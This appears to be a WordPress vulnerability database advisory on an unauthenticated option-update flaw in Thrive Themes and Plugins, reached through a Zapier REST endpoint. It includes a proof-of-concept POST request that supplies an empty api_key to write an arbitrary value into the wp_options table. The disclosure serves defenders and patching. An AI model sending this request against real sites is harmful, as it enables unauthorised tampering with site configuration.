All Thrive Themes and Plugins - Unauthenticated Option Update

2021-03-24T00:00:00
ID WPVDB-ID:35ACD2D8-85FC-4AF5-8F6C-224FA7D92900
Type wpvulndb
Reporter Chloe Chamberland, Ram Gall, Charles Sweethill
Modified 2021-03-30T12:56:53

Description

The plugins and themes register a REST API endpoint associated with Zapier functionality. While this endpoint was intended to require an API key in order to access, it was possible to access it by supplying an empty api_key parameter in vulnerable versions if Zapier was not enabled. Attackers could use this endpoint to add arbitrary data to a predefined option in the wp_options table.

PoC

POST /wp-json/td/v1/optin/subscription HTTP/1.1 Host: [URL] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 54 hook_url={"http:\/\/key":"maliciousfile.php"}&api;_key=